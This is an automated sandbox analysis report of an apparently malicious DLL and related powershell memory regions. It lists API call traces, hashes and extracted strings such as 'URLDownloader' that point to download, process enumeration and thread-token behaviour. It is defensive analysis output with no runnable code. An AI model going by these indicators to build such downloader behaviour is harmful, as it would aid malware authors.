                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 10004F69
                                                                                                  • memset.VCRUNTIME140(?,00000000,?), ref: 10004F97
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000), ref: 10004FB5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide$memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 1216362210-0
                                                                                                  • Opcode ID: b7bee2a040cd1640bfdf514d1c4ee8a6aa7dfffc560f49adb40942a3e1296025
                                                                                                  • Instruction ID: b6c0c3fe9f7a8ecbfd6a68903a988b9ee954c4047185b56f79f4f3260df6d144
                                                                                                  • Opcode Fuzzy Hash: b7bee2a040cd1640bfdf514d1c4ee8a6aa7dfffc560f49adb40942a3e1296025
                                                                                                  • Instruction Fuzzy Hash: 71312FB5E40208BFEB14DBD8CC86FAEB7B5EB48710F204254F615AB2C0D671AB408B55
                                                                                                  APIs
                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 008D1F84
                                                                                                  • Process32FirstW.KERNEL32(000000FF,0000022C), ref: 008D1FC5
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000), ref: 008D1FEC
                                                                                                  • CloseHandle.KERNEL32(000000FF,?,?), ref: 008D202C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1734162605.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_8d0000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharCloseCreateFirstHandleMultiProcess32SnapshotToolhelp32Wide
                                                                                                  • String ID:
                                                                                                  • API String ID: 1100011785-0
                                                                                                  • Opcode ID: ad4cc8196aeaec05983c793c26f6bcab303a0f1f4c84ce765135adf8375fdcb0
                                                                                                  • Instruction ID: 56e0133e809c5604f7c6c117e1a27ce243a5da3fdbf5cffbcb88a21ca850ea0d
                                                                                                  • Opcode Fuzzy Hash: ad4cc8196aeaec05983c793c26f6bcab303a0f1f4c84ce765135adf8375fdcb0
                                                                                                  • Instruction Fuzzy Hash: 57216071904218BBDB20DBE4CC89FEEB778EB18711F108289F605E62D0D7749B49DB61
                                                                                                  APIs
                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,100185DC), ref: 008E5DE1
                                                                                                  • GetLastError.KERNEL32 ref: 008E5DEA
                                                                                                  • CloseHandle.KERNEL32(?), ref: 008E5DFB
                                                                                                  • GetCurrentThread.KERNEL32 ref: 008E5E13
                                                                                                  • WaitForSingleObject.KERNEL32(00000000), ref: 008E5E1A
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,1000B570,00000000,00000000,00000000), ref: 008E5E2F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1734162605.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_8d0000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateThread$CloseCurrentErrorHandleLastMutexObjectSingleWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 3416154964-0
                                                                                                  • Opcode ID: 932af6c73dcd6bb60c1c2832b1bdd1deeeb21924d37d70f5ea829a4b8e9779f7
                                                                                                  • Instruction ID: 6d64b876953bb19cb699e803bcb042b324546c826c2b09a0bcd7f9f752857c95
                                                                                                  • Opcode Fuzzy Hash: 932af6c73dcd6bb60c1c2832b1bdd1deeeb21924d37d70f5ea829a4b8e9779f7
                                                                                                  • Instruction Fuzzy Hash: 8A01447068471CFBF791ABF48C4EB5D3A64EB09706F104450F709EA1D0DAB4D7448B25
                                                                                                  APIs
                                                                                                  • ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPBD_J@Z.MSVCP140(?,?,?), ref: 10011A61
                                                                                                  • ?_Pnavail@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBE_JXZ.MSVCP140 ref: 10011A7B
                                                                                                  • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(00000000,?), ref: 10011ACC
                                                                                                  • ?pbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH@Z.MSVCP140(?), ref: 10011AFD
                                                                                                  • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,00000000), ref: 10011B2C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: D@std@@@std@@U?$char_traits@$?pbump@?$basic_streambuf@?pptr@?$basic_streambuf@?xsputn@?$basic_streambuf@Pnavail@?$basic_streambuf@fwrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 1074265955-0
                                                                                                  • Opcode ID: 5ddc3c7a704c1f435e1f2cf7b7af9729b09afe2cf8c3f8fc50bc04272bbf712c
                                                                                                  • Instruction ID: f3b0000acd429ac5cb95c2efd876261dd8ef2d3ed187a2a6324a5f7f02af080d
                                                                                                  • Opcode Fuzzy Hash: 5ddc3c7a704c1f435e1f2cf7b7af9729b09afe2cf8c3f8fc50bc04272bbf712c
                                                                                                  • Instruction Fuzzy Hash: 9E41B075A04249EFDB48CF98C885ADEBBB5FF88314F10C559E92A9B250D774EA80CF50
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1734162605.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_8d0000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: dllmain_raw$Main@12
                                                                                                  • String ID:
                                                                                                  • API String ID: 2964726511-0
                                                                                                  • Opcode ID: 77c2d8ce7624c59a58bc0892d1e6724f43cbeeb330e080506059902503b60b19
                                                                                                  • Instruction ID: b15ebecdada4f7a35fc6c4c9f191828b41ff2b54bc5dd741f42104f49dd7496c
                                                                                                  • Opcode Fuzzy Hash: 77c2d8ce7624c59a58bc0892d1e6724f43cbeeb330e080506059902503b60b19
                                                                                                  • Instruction Fuzzy Hash: 1D218371E00299ABDB219F1BCC41A6F7A69FBB2BD4B158125F815E7224E3308D619BD0
                                                                                                  APIs
                                                                                                  • _callnewh.API-MS-WIN-CRT-HEAP-L1-1-0(00001000,?,1000135C,00001000,?,10004B1D,00001000), ref: 10015FEE
                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00001000,?,1000135C,00001000,?,10004B1D,00001000), ref: 10015FFB
                                                                                                  • _CxxThrowException.VCRUNTIME140(?,10019CBC), ref: 100166FE
                                                                                                  • stdext::threads::lock_error::lock_error.LIBCPMTD ref: 1001670D
                                                                                                  • _CxxThrowException.VCRUNTIME140(?,10019D9C), ref: 1001671B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionThrow$_callnewhmallocstdext::threads::lock_error::lock_error
                                                                                                  • String ID:
                                                                                                  • API String ID: 1722040371-0
                                                                                                  • Opcode ID: 484d703399dcadcd353398c13584d4514a4cbdd0134b2ce45ad199602cde101f
                                                                                                  • Instruction ID: 08eecf3aab68b4969477acf4f8a3a2caa643f1c7ff8f01e52dc4bc7ddf13aa92
                                                                                                  • Opcode Fuzzy Hash: 484d703399dcadcd353398c13584d4514a4cbdd0134b2ce45ad199602cde101f
                                                                                                  • Instruction Fuzzy Hash: 56F0543880420DB78F04E6B9EC169ED777CEB04290F604125FA689D4D5EB71F6DA85D4
                                                                                                  APIs
                                                                                                  • AcquireSRWLockExclusive.KERNEL32(1001C31C,URLDownloader,?,100015D9,1001C6D4), ref: 10015F3B
                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(1001C31C,?,100015D9,1001C6D4), ref: 10015F6E
                                                                                                  • WakeAllConditionVariable.KERNEL32(1001C318,?,100015D9,1001C6D4), ref: 10015F79
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExclusiveLock$AcquireConditionReleaseVariableWake
                                                                                                  • String ID: URLDownloader
                                                                                                  • API String ID: 1466638765-1891997712
                                                                                                  • Opcode ID: 5c957333df92aa0d20994f740975eb8c520519e24ded03d2bd78703f65689582
                                                                                                  • Instruction ID: 2635d989befe49f68561a0190eacd187a5f89713392b86b322bdf01f88d219c5
                                                                                                  • Opcode Fuzzy Hash: 5c957333df92aa0d20994f740975eb8c520519e24ded03d2bd78703f65689582
                                                                                                  • Instruction Fuzzy Hash: 88F0C975900628DFE746DF58D8C8E957BA8FB4D394B06C069FA0987322CB34EA50CB95
                                                                                                  APIs
                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 008D4ECE
                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,?), ref: 008D4F28
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 008D4F40
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000), ref: 008D4F8C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1734162605.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_8d0000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 626452242-0
                                                                                                  • Opcode ID: 2ad7ddd50886c6f136297177ce94159ccb7120c9250006a8d7e0e413235becb2
                                                                                                  • Instruction ID: db97df3be1912b4587aafe772c44d6cae73165b6fd5ff4748f986f432d7c34ab
                                                                                                  • Opcode Fuzzy Hash: 2ad7ddd50886c6f136297177ce94159ccb7120c9250006a8d7e0e413235becb2
                                                                                                  • Instruction Fuzzy Hash: CE31EFB5E40208BFEB14DBD8CD86FAEB7B5EB49710F204254F615AB3D0D6B1AB008B55
                                                                                                  APIs
                                                                                                  • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,10017B76,000000FF,?,10013642,?), ref: 10013A90
                                                                                                  • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,10017B76,000000FF,?,10013642), ref: 10013AAB
                                                                                                  • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,10013642,?), ref: 10013ADF
                                                                                                  • ??1_Lockit@std@@QAE@XZ.MSVCP140(?), ref: 10013B57
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Getcat@?$codecvt@Mbstatet@@@std@@V42@@Vfacet@locale@2@
                                                                                                  • String ID:
                                                                                                  • API String ID: 1566052064-0
                                                                                                  • Opcode ID: fe2f488380e94dcbeb70f586553934bb7d96351eb8217fb32b8625d7819b8d05
                                                                                                  • Instruction ID: 47359edd55c6cc15742bff4ced4580a4001c133a1fe49908c7c5117e5c40c52a
                                                                                                  • Opcode Fuzzy Hash: fe2f488380e94dcbeb70f586553934bb7d96351eb8217fb32b8625d7819b8d05
                                                                                                  • Instruction Fuzzy Hash: DD3141B4D00259DFDB04DF94D981BEEBBB4FF48310F208659E52667391DB34AA84CBA1
                                                                                                  APIs
                                                                                                  • __RTC_Initialize.LIBCMT ref: 10016409
                                                                                                    • Part of subcall function 10016CAE: InitializeSListHead.KERNEL32(1001C360,10016413,10019C58,00000010,100163A4,?,?,?,100165CA,?,00000001,?,?,00000001,?,10019CA0), ref: 10016CB3
                                                                                                  • _initterm_e.API-MS-WIN-CRT-RUNTIME-L1-1-0(100182EC,100182F0,10019C58,00000010,100163A4,?,?,?,100165CA,?,00000001,?,?,00000001,?,10019CA0), ref: 10016422
                                                                                                  • _initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0(100182CC,100182E8,10019C58,00000010,100163A4,?,?,?,100165CA,?,00000001,?,?,00000001,?,10019CA0), ref: 10016440
                                                                                                  • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 10016473
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image_initterm_initterm_e
                                                                                                  • String ID:
                                                                                                  • API String ID: 590286634-0
                                                                                                  • Opcode ID: c66be37b7fa5c5e393c4edeaf5cfb5ebc56572853e82811de3f62df1bd00dbee
                                                                                                  • Instruction ID: e11346addbbd0b20877a0dd20a8321200fe6c64d5ca488d70c2580f7c5b0b6f1
                                                                                                  • Opcode Fuzzy Hash: c66be37b7fa5c5e393c4edeaf5cfb5ebc56572853e82811de3f62df1bd00dbee
                                                                                                  • Instruction Fuzzy Hash: 0C212439544215ABEF01DBB49C027DD37A1EF0E3A4F108009F5966F1C2CB32E6C5C6AA
                                                                                                  APIs
                                                                                                  • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10011F5D
                                                                                                  • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10011F6A
                                                                                                  • ?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10011F75
                                                                                                  • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10011F82
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$?egptr@?$basic_streambuf@
                                                                                                  • String ID:
                                                                                                  • API String ID: 2950233615-0
                                                                                                  • Opcode ID: 1e4bcc0d99ed487de32ae37c9549659cbe616bda3220ddbe920771c154be9835
                                                                                                  • Instruction ID: d4953d2e9632dab8d67af48db5b56fd773fcfbd27f84caad3cc3cb56b92c495c
                                                                                                  • Opcode Fuzzy Hash: 1e4bcc0d99ed487de32ae37c9549659cbe616bda3220ddbe920771c154be9835
                                                                                                  • Instruction Fuzzy Hash: FA110D74E00119EFCB58DFA4D9959EDB7B5FF48200B1181A9E805AB351EB30EF45DB90
                                                                                                  APIs
                                                                                                  • ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,?,10012136), ref: 10012C3A
                                                                                                  • ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,10012136), ref: 10012C4D
                                                                                                  • ?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,10012136), ref: 10012C5C
                                                                                                  • ?setg@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAD00@Z.MSVCP140(100120FA,100120FA,100120F9,?,10012136), ref: 10012C80
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: D@std@@@std@@U?$char_traits@$?eback@?$basic_streambuf@$?egptr@?$basic_streambuf@?setg@?$basic_streambuf@D00@
                                                                                                  • String ID:
                                                                                                  • API String ID: 3089488326-0
                                                                                                  • Opcode ID: 31da55f76b99386bfca52db2829809a8af7d29f5ef04e72f75014f1d39d39b3f
                                                                                                  • Instruction ID: 718b455e6a9fe28b5531d214fab6855221ed4fdccad38d515428ce19cb46a070
                                                                                                  • Opcode Fuzzy Hash: 31da55f76b99386bfca52db2829809a8af7d29f5ef04e72f75014f1d39d39b3f
                                                                                                  • Instruction Fuzzy Hash: 97F0AF74901108EFCB48DF98CD9599EB7B6FF48305B20819AE406A3351DB31AF15DB54
                                                                                                  APIs
                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(00000001), ref: 008E6BDD
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 008E6BEC
                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 008E6BF5
                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 008E6C02
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1734162605.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_8d0000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2933794660-0
                                                                                                  • Opcode ID: 842f5c9d0410f161de26bc26939d162bf704e3e37519bf8139df35696172d6f0
                                                                                                  • Instruction ID: 6b5b90a3d804e5009f3a100d95e0ac76ac391a824cc924ed74941b345312ade6
                                                                                                  • Opcode Fuzzy Hash: 842f5c9d0410f161de26bc26939d162bf704e3e37519bf8139df35696172d6f0
                                                                                                  • Instruction Fuzzy Hash: 2CF05F74D1021DEBDB41DBB4CA8999EBBF4EF1C204BA18695E412E6110E630AB489B50
                                                                                                  APIs
                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10005573
                                                                                                  • Concurrency::task_continuation_context::task_continuation_context.LIBCPMTD ref: 10005672
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Concurrency::task_continuation_context::task_continuation_contextFileModuleName
                                                                                                  • String ID: .exe
                                                                                                  • API String ID: 2188046178-4119554291
                                                                                                  • Opcode ID: 3b2a378ae6b5d3c41a68bce81ab8d2cf5858c1a4f11638c67dec6678d81bd9d9
                                                                                                  • Instruction ID: 322e95b2db96aea7f088eda3d8bee12a526519093e635f9f9e857dc9ab2affb0
                                                                                                  • Opcode Fuzzy Hash: 3b2a378ae6b5d3c41a68bce81ab8d2cf5858c1a4f11638c67dec6678d81bd9d9
                                                                                                  • Instruction Fuzzy Hash: 15513774C04248EFEB15CBA4CC91BEEBBB5EF15300F148199E1167B296DB746B48CBA1
                                                                                                  APIs
                                                                                                  • AcquireSRWLockExclusive.KERNEL32(1001C31C,?,URLDownloader,?,100015AC,1001C6D4), ref: 10015F8D
                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(1001C31C,?,100015AC,1001C6D4), ref: 10015FC7
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1738782885.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1738757132.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739013263.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739067862.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.1739090953.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_10000000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExclusiveLock$AcquireRelease
                                                                                                  • String ID: URLDownloader
                                                                                                  • API String ID: 17069307-1891997712
                                                                                                  • Opcode ID: c507f487d7d077287d29d7c699356b7419b72d79d52241de38d01319ea44f226
                                                                                                  • Instruction ID: 6adcf340ed2f6481699652d891028e0f11606ccd9733c9b7c4ba67a8641b8b52
                                                                                                  • Opcode Fuzzy Hash: c507f487d7d077287d29d7c699356b7419b72d79d52241de38d01319ea44f226
                                                                                                  • Instruction Fuzzy Hash: 24F08234500618DFD310DF18C884E1977A4EB49676F15423DE9698F291C731D982CA52

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:6.1%
                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                  Signature Coverage:0%
                                                                                                  Total number of Nodes:3
                                                                                                  Total number of Limit Nodes:0
                                                                                                  execution_graph 20890 8496428 20891 849646b SetThreadToken 20890->20891 20892 8496499 20891->20892

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 625 44bb470-44bb4a9 627 44bb4ab 625->627 628 44bb4ae-44bb7e9 call 44bacbc 625->628 627->628 689 44bb7ee-44bb7f5 628->689
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e027ffa036cefa394de507a71af34a5ec5eb46c05e1a99f8a33ddf834f3d0eef
                                                                                                  • Instruction ID: b9fef6662d843ff6804efd60ade10e40aeb6f796d97323337e972a3ffaf00395
                                                                                                  • Opcode Fuzzy Hash: e027ffa036cefa394de507a71af34a5ec5eb46c05e1a99f8a33ddf834f3d0eef
                                                                                                  • Instruction Fuzzy Hash: 5C918471A01654AFEB19EFB888105AF7BF2EF84B10B00C91DD546AB740DF346D069BE5

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 690 44bb490-44bb4a9 691 44bb4ab 690->691 692 44bb4ae-44bb7e9 call 44bacbc 690->692 691->692 753 44bb7ee-44bb7f5 692->753
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1352425125.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_44b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e9c40606afb28dd1a05d3f0ff831a2d625aaf7d48dac0ffc36bc484c67f63ee7
                                                                                                  • Instruction ID: 68298f266d573a722c9b276bca9132493b98c9288f7d24b0e721e0fd5aff863b
                                                                                                  • Opcode Fuzzy Hash: e9c40606afb28dd1a05d3f0ff831a2d625aaf7d48dac0ffc36bc484c67f63ee7
                                                                                                  • Instruction Fuzzy Hash: 76914171A01618AFEF59EBB884105AF7BF2EF84B10B00C91DD506AB740DF346D069BE5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1362601776.0000000007330000.00000040.00000800.00020000.00000000.sdmp, Offset: 07330000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_7330000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: pibk$pibk$pibk$pibk$pibk$|,dk
                                                                                                  • API String ID: 0-2914658708
                                                                                                  • Opcode ID: ff0b6dad33c690c4ad1eedd2636f4602c26d1dc361114662c9a52e3a28ce0eba
                                                                                                  • Instruction ID: 17fe850eba1e28973d6630451067f0930ce699b31223234837c876977f981af6
                                                                                                  • Opcode Fuzzy Hash: ff0b6dad33c690c4ad1eedd2636f4602c26d1dc361114662c9a52e3a28ce0eba
